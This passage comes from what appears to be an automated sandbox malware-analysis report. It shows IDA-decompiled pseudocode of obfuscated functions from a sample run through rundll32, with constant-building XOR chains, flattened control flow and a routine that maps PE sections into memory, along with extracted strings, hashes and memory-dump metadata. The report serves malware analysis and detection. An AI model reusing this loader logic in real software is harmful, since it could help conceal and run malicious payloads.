				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t245;
				signed int _t255;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t284;
				void* _t285;
				signed int _t288;
				intOrPtr* _t292;
				signed int* _t293;

				_t293 =  &_v1680;
				_t292 = __edx;
				_t259 = __ecx;
				_v1564 = _v1564 & 0x00000000;
				_v1572 = 0x37b7f6;
				_v1568 = 0x1b2ce7;
				_v1632 = 0xec6c;
				_v1632 = _v1632 | 0x543bf563;
				_v1632 = _v1632 ^ 0x543bfd46;
				_v1636 = 0xa23a;
				_v1636 = _v1636 ^ 0x26fe42ca;
				_v1636 = _v1636 >> 0xa;
				_v1636 = _v1636 ^ 0x0009dc41;
				_v1592 = 0x1eb7;
				_v1592 = _v1592 >> 6;
				_v1592 = _v1592 ^ 0x000051d7;
				_v1668 = 0xa1e9;
				_v1668 = _v1668 | 0x5efbd7df;
				_v1668 = _v1668 ^ 0xd3f751b9;
				_v1668 = _v1668 ^ 0x8d0c9003;
				_v1600 = 0x7d57;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x00001a4f;
				_v1608 = 0xd589;
				_v1608 = _v1608 | 0xf26b7913;
				_v1608 = _v1608 << 1;
				_v1608 = _v1608 ^ 0xe4d78fb5;
				_v1660 = 0xf169;
				_v1660 = _v1660 * 0x1f;
				_t285 = 0x2a877a8b;
				_t261 = 0x5a;
				_v1660 = _v1660 * 7;
				_v1660 = _v1660 << 1;
				_v1660 = _v1660 ^ 0x019971bd;
				_v1676 = 0xe75c;
				_v1676 = _v1676 + 0xc4d1;
				_v1676 = _v1676 << 0xf;
				_v1676 = _v1676 + 0xffffa84d;
				_v1676 = _v1676 ^ 0xd6161939;
				_v1672 = 0xb9d6;
				_v1672 = _v1672 | 0xb865191f;
				_v1672 = _v1672 ^ 0x5b4935e3;
				_v1672 = _v1672 << 0xd;
				_v1672 = _v1672 ^ 0x9187b9b3;
				_v1680 = 0xc4d6;
				_v1680 = _v1680 + 0x7c91;
				_v1680 = _v1680 + 0xf8dc;
				_v1680 = _v1680 * 0x27;
				_v1680 = _v1680 ^ 0x0056b694;
				_v1616 = 0xc221;
				_v1616 = _v1616 / _t261;
				_v1616 = _v1616 * 0x3f;
				_v1616 = _v1616 ^ 0x0000fe69;
				_v1652 = 0xbd2c;
				_v1652 = _v1652 ^ 0xe1569e35;
				_v1652 = _v1652 << 0xf;
				_v1652 = _v1652 + 0xffff718d;
				_v1652 = _v1652 ^ 0x118bace2;
				_v1580 = 0x567b;
				_v1580 = _v1580 >> 0x10;
				_v1580 = _v1580 ^ 0x00003991;
				_v1576 = 0x298;
				_v1576 = _v1576 << 7;
				_v1576 = _v1576 ^ 0x000109d6;
				_v1588 = 0xb305;
				_v1588 = _v1588 * 0x60;
				_v1588 = _v1588 ^ 0x00433d2e;
				_v1584 = 0x64b3;
				_v1584 = _v1584 >> 0xd;
				_v1584 = _v1584 ^ 0x000018d8;
				_v1624 = 0xad96;
				_t262 = 0x50;
				_v1624 = _v1624 / _t262;
				_v1624 = _v1624 * 0x13;
				_v1624 = _v1624 ^ 0x00007713;
				_v1664 = 0x908a;
				_v1664 = _v1664 >> 6;
				_v1664 = _v1664 << 4;
				_v1664 = _v1664 >> 8;
				_v1664 = _v1664 ^ 0x00007bdf;
				_v1644 = 0x7153;
				_v1644 = _v1644 + 0xffffa87a;
				_v1644 = _v1644 << 0xd;
				_v1644 = _v1644 ^ 0x0339cebf;
				_v1640 = 0x1652;
				_v1640 = _v1640 << 0xa;
				_v1640 = _v1640 >> 9;
				_v1640 = _v1640 ^ 0x00000730;
				_v1612 = 0x36fe;
				_v1612 = _v1612 >> 5;
				_v1612 = _v1612 << 3;
				_v1612 = _v1612 ^ 0x000008d8;
				_v1596 = 0x1208;
				_v1596 = _v1596 >> 6;
				_v1596 = _v1596 ^ 0x00000ad2;
				_v1656 = 0xf95a;
				_v1656 = _v1656 ^ 0x8de5a0e4;
				_v1656 = _v1656 + 0xffff7609;
				_v1656 = _v1656 + 0xc07d;
				_v1656 = _v1656 ^ 0x8de5882f;
				_v1620 = 0xca5e;
				_v1620 = _v1620 | 0x2303d271;
				_v1620 = _v1620 + 0xcb9;
				_v1620 = _v1620 ^ 0x2303c846;
				_v1628 = 0x9429;
				_v1628 = _v1628 >> 7;
				_v1628 = _v1628 >> 2;
				_v1628 = _v1628 ^ 0x0000014e;
				_v1648 = 0x513a;
				_v1648 = _v1648 >> 0xf;
				_v1648 = _v1648 | 0xb7f5bffb;
				_v1648 = _v1648 ^ 0xb7f5b057;
				_v1604 = 0xa39d;
				_v1604 = _v1604 + 0xffffa1e7;
				_v1604 = _v1604 ^ 0x00005123;
				_t284 = _v1604;
				while(_t285 != 0xa9a8994) {
					if(_t285 == 0x1592b590) {
						_push( &_v520);
						_push(0x431000);
						_t245 = E0044B165(_t259, _t292);
						asm("sbb esi, esi");
						_t288 =  ~_t245 & 0xf51449f8;
						L10:
						_t285 = _t288 + 0x29fbdc3d;
						L8:
						_t262 = 0x50;
						continue;
					}
					if(_t285 == 0x1f102635) {
						_push(_t262);
						E0043471A(_v1632,  &_v1040, _v1668, _v1600, _v1608, _v1660, _v1676);
						_push(0x4310b0);
						_push(_v1652);
						_push(_v1616);
						E0043A4D7(__eflags, _v1576, _v1588, _v1584, _v1624, E00435DFC(_v1672, _v1680, __eflags),  &_v1040,  &_v1560,  &_v520);
						E00440D6D(_v1664, _v1644, _v1640, _t248);
						_push(0);
						_push( &_v1560);
						_push(_v1628);
						_push(_v1620);
						_push(_v1656);
						_push(_v1596);
						_push(0);
						_push(0);
						_t255 = E00436417(_v1612, __eflags);
						_t293 =  &(_t293[0x1d]);
						asm("sbb esi, esi");
						_t288 =  ~_t255 & 0xe09ead57;
						__eflags = _t288;
						goto L10;
					}
					if(_t285 == 0x29fbdc3d) {
						return E0043DE81(_v1648, _t284, _v1604);
					}
					if(_t285 != 0x2a877a8b) {
						L13:
						__eflags = _t285 - 0x1e6f5ee2;
						if(_t285 != 0x1e6f5ee2) {
							continue;
						} else {
							return _t255;
						}
						L16:
						return _t255;
					}
					_push(_t262);
					_t255 = E004354FB(_t262);
					_t284 = _t255;
					if(_t284 != 0) {
						_t285 = 0x1592b590;
						goto L8;
					}
					goto L16;
				}
				 *((intOrPtr*)(_t284 + 0x44)) = _t259;
				_t285 = 0x1e6f5ee2;
				 *_t284 =  *0x451084;
				 *0x451084 = _t284;
				goto L13;
			}

0x00446be4
0x00446bee
0x00446bf0
0x00446bf2
0x00446bfa
0x00446c02
0x00446c0d
0x00446c15
0x00446c1d
0x00446c25
0x00446c2d
0x00446c35
0x00446c3a
0x00446c42
0x00446c4a
0x00446c4f
0x00446c57
0x00446c5f
0x00446c67
0x00446c6f
0x00446c77
0x00446c7f
0x00446c84
0x00446c8c
0x00446c94
0x00446c9c
0x00446ca0
0x00446ca8
0x00446cb5
0x00446cc2
0x00446cc7
0x00446cc8
0x00446ccc
0x00446cd0
0x00446cd8
0x00446ce0
0x00446ce8
0x00446ced
0x00446cf5
0x00446cfd
0x00446d05
0x00446d0d
0x00446d15
0x00446d1a
0x00446d22
0x00446d2a
0x00446d32
0x00446d3f
0x00446d43
0x00446d4b
0x00446d59
0x00446d62
0x00446d66
0x00446d6e
0x00446d76
0x00446d7e
0x00446d83
0x00446d8b
0x00446d93
0x00446d9b
0x00446da0
0x00446da8
0x00446db0
0x00446db5
0x00446dbd
0x00446dca
0x00446dce
0x00446dd6
0x00446dde
0x00446de3
0x00446ded
0x00446dfb
0x00446dfe
0x00446e07
0x00446e0b
0x00446e13
0x00446e1b
0x00446e20
0x00446e25
0x00446e2a
0x00446e32
0x00446e3a
0x00446e42
0x00446e47
0x00446e4f
0x00446e57
0x00446e5c
0x00446e61
0x00446e69
0x00446e71
0x00446e76
0x00446e7b
0x00446e83
0x00446e8b
0x00446e90
0x00446e98
0x00446ea0
0x00446ea8
0x00446eb0
0x00446eb8
0x00446ec0
0x00446ec8
0x00446ed0
0x00446ed8
0x00446ee0
0x00446ee8
0x00446eed
0x00446ef2
0x00446efa
0x00446f02
0x00446f07
0x00446f0f
0x00446f17
0x00446f1f
0x00446f27
0x00446f2f
0x00446f33
0x00446f45
0x00447074
0x00447075
0x0044707c
0x00447086
0x00447089
0x00447060
0x00447060
0x00446f8b
0x00446f8d
0x00000000
0x00446f8d
0x00446f51
0x00446f90
0x00446fb1
0x00446fb6
0x00446fbb
0x00446fbf
0x0044700e
0x00447023
0x00447031
0x00447032
0x00447033
0x00447037
0x0044703b
0x0044703f
0x0044704a
0x0044704b
0x0044704c
0x00447051
0x00447058
0x0044705a
0x0044705a
0x00000000
0x0044705a
0x00446f59
0x00000000
0x004470c3
0x00446f65
0x004470a6
0x004470a6
0x004470ac
0x00000000
0x00000000
0x00000000
0x00000000
0x004470ce
0x004470ce
0x004470ce
0x00446f75
0x00446f76
0x00446f7b
0x00446f80
0x00446f86
0x00000000
0x00446f86
0x00000000
0x00446f80
0x00447091
0x00447094
0x0044709e
0x004470a0
0x00000000

Strings

l, xrefs: 00446C0D
#Q, xrefs: 00446F27
\, xrefs: 00446CD8
Sq, xrefs: 00446E32
W}, xrefs: 00446C77
:Q, xrefs: 00446EFA
5I[, xrefs: 00446D0D
{V, xrefs: 00446D93

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #Q$:Q$Sq$W}$\$l${V$5I[
API String ID: 0-985771713
Opcode ID: d0d2c581e34f9e09e86db2ac2f86673e32cbbd965f319d56b46f003788c9c03e
Instruction ID: ea065f5a60cb330bf448dd34ebcee32329fe61c96998566e8f0e767702cb726e
Opcode Fuzzy Hash: d0d2c581e34f9e09e86db2ac2f86673e32cbbd965f319d56b46f003788c9c03e
Instruction Fuzzy Hash: FDC133724093809FE369CF25C58994BFBF1BB88748F104A1DF1E5962A0D3B98908CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0043E044, Relevance: 10.2, Strings: 8, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0043E044() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _t217;
				signed int _t229;
				intOrPtr _t233;
				intOrPtr _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				void* _t272;
				char _t276;
				signed int* _t277;
				void* _t279;

				_t277 =  &_v116;
				_v24 = 0x1c11a0;
				_t234 = 0;
				_v20 = 0;
				_v64 = 0x3d72;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0x0000ca76;
				_v68 = 0xf5cd;
				_v68 = _v68 + 0xffff2303;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x031a7530;
				_v96 = 0x9dde;
				_t236 = 0x63;
				_t272 = 0x178fbfee;
				_v96 = _v96 / _t236;
				_v96 = _v96 ^ 0xbe21e7a5;
				_v96 = _v96 | 0x0866bec9;
				_v96 = _v96 ^ 0xbe67b68d;
				_v100 = 0xb412;
				_v100 = _v100 | 0xcdc2e5f8;
				_v100 = _v100 + 0x255c;
				_v100 = _v100 ^ 0x3ca6a3af;
				_v100 = _v100 ^ 0xf165da8a;
				_v48 = 0xdf62;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0x0df67e0a;
				_v88 = 0x25f4;
				_v88 = _v88 >> 2;
				_v88 = _v88 + 0xffff1fdf;
				_v88 = _v88 ^ 0xffff2442;
				_v60 = 0x15df;
				_v60 = _v60 / _t236;
				_v60 = _v60 ^ 0x00004288;
				_v80 = 0x3276;
				_v80 = _v80 + 0xffff6148;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x1fffb761;
				_v84 = 0xd242;
				_t237 = 0x2a;
				_v84 = _v84 / _t237;
				_v84 = _v84 + 0x4474;
				_v84 = _v84 ^ 0x000073b3;
				_v56 = 0xcf32;
				_v56 = _v56 ^ 0x8ff9b71f;
				_v56 = _v56 ^ 0x8ff93793;
				_v116 = 0xfed9;
				_v116 = _v116 + 0xbfa2;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 * 0x49;
				_v116 = _v116 ^ 0x00007060;
				_v104 = 0xd971;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xb0610f19;
				_v104 = _v104 ^ 0xb061137f;
				_v72 = 0x5818;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0xc63d;
				_v72 = _v72 ^ 0x00b0f2f6;
				_v52 = 0x41b5;
				_v52 = _v52 ^ 0x7ab325a0;
				_v52 = _v52 ^ 0x7ab35b35;
				_v108 = 0x4ac4;
				_v108 = _v108 + 0xcc33;
				_t238 = 0x38;
				_v108 = _v108 / _t238;
				_v108 = _v108 | 0xd9acbeeb;
				_v108 = _v108 ^ 0xd9acd52b;
				_v112 = 0x4e86;
				_t239 = 0x47;
				_v112 = _v112 * 0x38;
				_v112 = _v112 >> 4;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0x0044e3e3;
				_v76 = 0x72be;
				_v76 = _v76 << 5;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x2be030c0;
				_v40 = 0x48f5;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0x091e8e4b;
				_v44 = 0x527b;
				_v44 = _v44 + 0xffff49c6;
				_v44 = _v44 ^ 0xffffdf12;
				_v92 = 0xbc66;
				_v92 = _v92 * 0x33;
				_v92 = _v92 / _t239;
				_t240 = 0x72;
				_v92 = _v92 / _t240;
				_v92 = _v92 ^ 0x0000393e;
				_t271 = _v36;
				_t276 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t279 = _t272 - 0x178fbfee;
						if(_t279 > 0) {
							break;
						}
						if(_t279 == 0) {
							_t272 = 0xe2793e3;
							continue;
						}
						if(_t272 == 0x47767b9) {
							E0043DE81(_v112, _v32, _v76);
							_t272 = 0x28fbaa29;
							continue;
						}
						if(_t272 == 0x4d34f17) {
							_t229 = E0043F5E0(_v80, _v84, _v56,  &_v16,  &_v32, _v116);
							_t277 =  &(_t277[4]);
							asm("sbb esi, esi");
							_t272 = ( ~_t229 & 0x361a5899) + 0x47767b9;
							continue;
						}
						if(_t272 == 0x55060ae) {
							_t272 = 0x28fbaa29;
							if(_v36 > 2) {
								_t233 = E00441090( *((intOrPtr*)(_t271 + 8)), _v88,  &_v28, _v60);
								_v32 = _t233;
								if(_t233 != 0) {
									_t272 = 0x4d34f17;
								}
							}
							continue;
						}
						if(_t272 != 0xe2793e3) {
							goto L21;
						} else {
							_t276 = E00440DC5();
							_t272 = 0x18910253;
							continue;
						}
					}
					if(_t272 == 0x18910253) {
						_t217 = E004374A7(_v68, _v96, _v100,  &_v36, _t276, _v48);
						_t271 = _t217;
						_t277 =  &(_t277[4]);
						if(_t217 == 0) {
							_t272 = 0x3b81234c;
							goto L21;
						}
						_t272 = 0x55060ae;
						goto L1;
					}
					if(_t272 == 0x28fbaa29) {
						E00441C64(_v40, _v44, _v92, _t271);
						L24:
						return _t234;
					}
					if(_t272 != 0x3a91c052) {
						goto L21;
					}
					_t185 =  &_v108; // 0x44e3e3
					E004421A5(_v104, _v72, _v12, _v8 + 1, _v52,  *0x451088 + 0x38,  *_t185);
					_t277 =  &(_t277[5]);
					_t234 = 1;
					_t272 = 0x47767b9;
					 *((intOrPtr*)( *0x451088 + 0xc)) = _v16;
					goto L1;
					L21:
				} while (_t272 != 0x3b81234c);
				goto L24;
			}

0x0043e044
0x0043e047
0x0043e052
0x0043e054
0x0043e058
0x0043e060
0x0043e065
0x0043e06d
0x0043e075
0x0043e07d
0x0043e082
0x0043e08a
0x0043e09b
0x0043e0a0
0x0043e0a5
0x0043e0a9
0x0043e0b1
0x0043e0b9
0x0043e0c1
0x0043e0c9
0x0043e0d1
0x0043e0d9
0x0043e0e1
0x0043e0e9
0x0043e0f1
0x0043e0f6
0x0043e0fe
0x0043e106
0x0043e10b
0x0043e113
0x0043e11b
0x0043e12b
0x0043e131
0x0043e139
0x0043e141
0x0043e149
0x0043e14e
0x0043e156
0x0043e162
0x0043e165
0x0043e169
0x0043e171
0x0043e179
0x0043e181
0x0043e189
0x0043e191
0x0043e199
0x0043e1a1
0x0043e1ab
0x0043e1af
0x0043e1b7
0x0043e1bf
0x0043e1c4
0x0043e1c9
0x0043e1d1
0x0043e1d9
0x0043e1e1
0x0043e1e6
0x0043e1ee
0x0043e1f6
0x0043e1fe
0x0043e206
0x0043e20e
0x0043e216
0x0043e226
0x0043e22b
0x0043e231
0x0043e239
0x0043e241
0x0043e24e
0x0043e251
0x0043e255
0x0043e25a
0x0043e25f
0x0043e267
0x0043e26f
0x0043e274
0x0043e279
0x0043e281
0x0043e289
0x0043e28e
0x0043e296
0x0043e29e
0x0043e2a6
0x0043e2ae
0x0043e2bb
0x0043e2c7
0x0043e2cf
0x0043e2d2
0x0043e2d6
0x0043e2de
0x0043e2e2
0x0043e2e2
0x0043e2e6
0x0043e2e6
0x0043e2e6
0x0043e2e6
0x0043e2ec
0x00000000
0x00000000
0x0043e2f2
0x0043e3b9
0x00000000
0x0043e3b9
0x0043e2fe
0x0043e3a9
0x0043e3af
0x00000000
0x0043e3af
0x0043e30a
0x0043e37e
0x0043e383
0x0043e38a
0x0043e392
0x00000000
0x0043e392
0x0043e312
0x0043e337
0x0043e33c
0x0043e34e
0x0043e353
0x0043e35b
0x0043e35d
0x0043e35d
0x0043e35b
0x00000000
0x0043e33c
0x0043e31a
0x00000000
0x0043e320
0x0043e329
0x0043e32b
0x00000000
0x0043e32b
0x0043e31a
0x0043e3c9
0x0043e446
0x0043e44b
0x0043e44d
0x0043e452
0x0043e45e
0x00000000
0x0043e45e
0x0043e454
0x00000000
0x0043e454
0x0043e3d1
0x0043e47e
0x0043e488
0x0043e48e
0x0043e48e
0x0043e3dd
0x00000000
0x00000000
0x0043e3e3
0x0043e40c
0x0043e41f
0x0043e422
0x0043e423
0x0043e428
0x00000000
0x0043e463
0x0043e463
0x00000000

Strings

D, xrefs: 0043E092, 0043E249, 0043E220
`p, xrefs: 0043E1AF
{R, xrefs: 0043E296
v2, xrefs: 0043E139
D, xrefs: 0043E3E3
tD, xrefs: 0043E169
\%, xrefs: 0043E0D1
>9, xrefs: 0043E2D6

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >9$\%$`p$tD$v2${R$D$D
API String ID: 0-2873933158
Opcode ID: adc62b6b1579776bd6896edafab710532ccc6e8fc6636346bda2544775829697
Instruction ID: 722abe7740cb6276ef019b7e098a1fb7fa24b5ed7789a45cd7185cf21dcc3752
Opcode Fuzzy Hash: adc62b6b1579776bd6896edafab710532ccc6e8fc6636346bda2544775829697
Instruction Fuzzy Hash: 54B1767280D3419FE354CF26C48940BBBE1BBD8358F40991EF595962A0D3B8D909CF8B

Uniqueness

Uniqueness Score: -1.00%

Function 0017D5B8, Relevance: 10.2, Strings: 8, Instructions: 237COMMON

Download Yara Rule

Strings

`p, xrefs: 0017D723
D, xrefs: 0017D7BD, 0017D606, 0017D794
tD, xrefs: 0017D6DD
{R, xrefs: 0017D80A
v2, xrefs: 0017D6AD
D, xrefs: 0017D957
\%, xrefs: 0017D645
>9, xrefs: 0017D84A

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >9$\%$`p$tD$v2${R$D$D
API String ID: 0-2873933158
Opcode ID: d239047f8fd533ba29a1152434985cbeae24259cbc72a2d0326ef89d7b38c88b
Instruction ID: 0f34ea9d8fc0cc8078f1ed66a7e6f82863d1b2eba18d6f8112d70c77c63c3392
Opcode Fuzzy Hash: d239047f8fd533ba29a1152434985cbeae24259cbc72a2d0326ef89d7b38c88b
Instruction Fuzzy Hash: D3B140729083459FE358CF25C48940BBBF1BBD4358F508A2DF5AA96264D3B4DA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00435B7D, Relevance: 10.1, Strings: 8, Instructions: 136
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00435B7D(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _t120;
				void* _t128;
				void* _t136;
				void* _t138;
				signed int _t140;
				void* _t157;
				void* _t162;
				intOrPtr* _t164;
				signed int* _t166;
				signed int* _t167;
				signed int* _t168;

				_t164 = __edx;
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				_t120 = E00442550(0);
				_v8 = _t120;
				_v4 = _t120;
				_v16 = 0xc2989;
				_v12 = 0x5a483c;
				_v52 = 0x3b44;
				_v52 = _v52 << 7;
				_t140 = 0x4c;
				_v52 = _v52 * 0x47;
				_v52 = _v52 ^ 0x0837fe00;
				_v60 = 0x214b;
				_v60 = _v60 + 0xffff3690;
				_v60 = _v60 + 0x4bfa;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0007dffd;
				_v68 = 0xfe09;
				_v68 = _v68 + 0x553f;
				_v68 = _v68 * 0x1d;
				_v68 = _v68 ^ 0x1b24c5d9;
				_v68 = _v68 ^ 0x1b02eedd;
				_v36 = 0xe0e0;
				_v36 = _v36 | 0x0a33301d;
				_v36 = _v36 ^ 0x0a33cb55;
				_v40 = 0x9bfa;
				_v40 = _v40 * 0x75;
				_v40 = _v40 ^ 0x004737ff;
				_v28 = 0x4d67;
				_v28 = _v28 * 0x2c;
				_v28 = _v28 ^ 0x000d0c51;
				_v64 = 0x3be;
				_v64 = _v64 + 0xc067;
				_v64 = _v64 + 0x5cfa;
				_v64 = _v64 / _t140;
				_v64 = _v64 ^ 0x0000016e;
				_v32 = 0x9b8d;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x00006036;
				_v48 = 0x458d;
				_v48 = _v48 >> 3;
				_v48 = _v48 + 0xffffc11e;
				_v48 = _v48 ^ 0xffffb28b;
				_v24 = 0x2d22;
				_v24 = _v24 + 0xffff832a;
				_v24 = _v24 ^ 0xffffbd86;
				_v44 = 0xc1ed;
				_v44 = _v44 << 0xa;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0xf6803b82;
				_v20 = 0x855f;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x00003be3;
				_v56 = 0x7b80;
				_v56 = _v56 * 0x26;
				_v56 = _v56 + 0xffff7d11;
				_v56 = _v56 ^ 0x0011d251;
				_t141 = _v68;
				_t128 = E004498B1(_v68, _v36, _v40, __edx);
				_t166 =  &(( &_v68)[8]);
				_t136 = _t128;
				if(_t136 != 0) {
					_t157 = E00442A07( *((intOrPtr*)(_t136 + 0x50)), _v60 | _v52, _v28, _t141, _v64, _v56, _v32);
					_t167 =  &(_t166[5]);
					if(_t157 == 0) {
						L6:
						return _t157;
					}
					E00436374(_v48, _t157,  *((intOrPtr*)(_t136 + 0x54)),  *__edx, _v24);
					_t168 =  &(_t167[3]);
					_t162 = ( *(_t136 + 0x14) & 0x0000ffff) + 0x18 + _t136;
					_t138 = ( *(_t136 + 6) & 0x0000ffff) * 0x28 + _t162;
					while(_t162 < _t138) {
						_t134 =  <  ?  *((void*)(_t162 + 8)) :  *((intOrPtr*)(_t162 + 0x10));
						E00436374(_v44,  *((intOrPtr*)(_t162 + 0xc)) + _t157,  <  ?  *((void*)(_t162 + 8)) :  *((intOrPtr*)(_t162 + 0x10)),  *_t164 +  *((intOrPtr*)(_t162 + 0x14)), _v20);
						_t168 =  &(_t168[3]);
						_t162 = _t162 + 0x28;
					}
					goto L6;
				}
				return _t128;
			}

0x00435b84
0x00435b86
0x00435b87
0x00435b8b
0x00435b8f
0x00435b93
0x00435b94
0x00435b95
0x00435b9a
0x00435ba0
0x00435ba4
0x00435bac
0x00435bb4
0x00435bbc
0x00435bc8
0x00435bca
0x00435bce
0x00435bd6
0x00435bde
0x00435be6
0x00435bee
0x00435bf3
0x00435bfb
0x00435c03
0x00435c10
0x00435c14
0x00435c1c
0x00435c24
0x00435c2c
0x00435c34
0x00435c3c
0x00435c49
0x00435c4d
0x00435c55
0x00435c62
0x00435c66
0x00435c6e
0x00435c76
0x00435c7e
0x00435c8c
0x00435c90
0x00435c98
0x00435ca0
0x00435ca5
0x00435cad
0x00435cb5
0x00435cba
0x00435cc2
0x00435cca
0x00435cd2
0x00435cda
0x00435ce2
0x00435cea
0x00435cef
0x00435cf4
0x00435cfc
0x00435d04
0x00435d09
0x00435d11
0x00435d1e
0x00435d22
0x00435d2a
0x00435d3a
0x00435d3e
0x00435d43
0x00435d46
0x00435d4a
0x00435d72
0x00435d74
0x00435d79
0x00435dd7
0x00000000
0x00435dd9
0x00435d8c
0x00435d95
0x00435d9f
0x00435da4
0x00435dd2
0x00435dbe
0x00435dc7
0x00435dcc
0x00435dcf
0x00435dcf
0x00000000
0x00435dd6
0x00435ddf

Strings

gM, xrefs: 00435C55
"-, xrefs: 00435CCA
;, xrefs: 00435D09
K!, xrefs: 00435BD6
6`, xrefs: 00435CA5
<HZ, xrefs: 00435BAC
?U, xrefs: 00435C03
D;, xrefs: 00435BB4

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "-$6`$<HZ$?U$D;$K!$gM$;
API String ID: 0-541240929
Opcode ID: 351712b6d6cbc9e8907103eb125a307d12d6f643fa008f15f0959c67586ec1b1
Instruction ID: 25d8e0f4609c73e01c17cc357d8822b3ed09196cc23e471cfd983f53cbc82a08
Opcode Fuzzy Hash: 351712b6d6cbc9e8907103eb125a307d12d6f643fa008f15f0959c67586ec1b1
Instruction Fuzzy Hash: C15122B1408340AFD354CF69C98980BFBF5BBC8358F409A1DF99996260D3BAD948CF06

Uniqueness

Uniqueness Score: -1.00%

Function 001750F1, Relevance: 10.1, Strings: 8, Instructions: 136COMMON

Download Yara Rule

Strings

D;, xrefs: 00175128
gM, xrefs: 001751C9
;, xrefs: 0017527D
"-, xrefs: 0017523E
<HZ, xrefs: 00175120
6`, xrefs: 00175219
K!, xrefs: 0017514A
?U, xrefs: 00175177

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "-$6`$<HZ$?U$D;$K!$gM$;
API String ID: 0-541240929
Opcode ID: bd18d84c34761732b3e16a2086b9908adac1db33b08af174a17316736eeaa7c0
Instruction ID: 31d6c1a321d78c12bbf40b1a6c28d37d20062a4b9fa93cc1f87948fe05604a59
Opcode Fuzzy Hash: bd18d84c34761732b3e16a2086b9908adac1db33b08af174a17316736eeaa7c0
Instruction Fuzzy Hash: F85133B1408380AFD354CF65C98981BFBF5BBC8758F408A1DF99996260D3BAC949CF06

Uniqueness

Uniqueness Score: -1.00%

Function 0017177C, Relevance: 10.1, Strings: 8, Instructions: 126COMMON

Download Yara Rule

Strings

)*, xrefs: 00171895
4j\, xrefs: 001717C0
&4, xrefs: 001718A7
!i, xrefs: 00171864
IX, xrefs: 001718DC
', xrefs: 001718FC
\, xrefs: 00171833
Y^, xrefs: 001718EA

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !i$&4$'$)*$4j\$IX$Y^$\
API String ID: 0-1966681874
Opcode ID: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
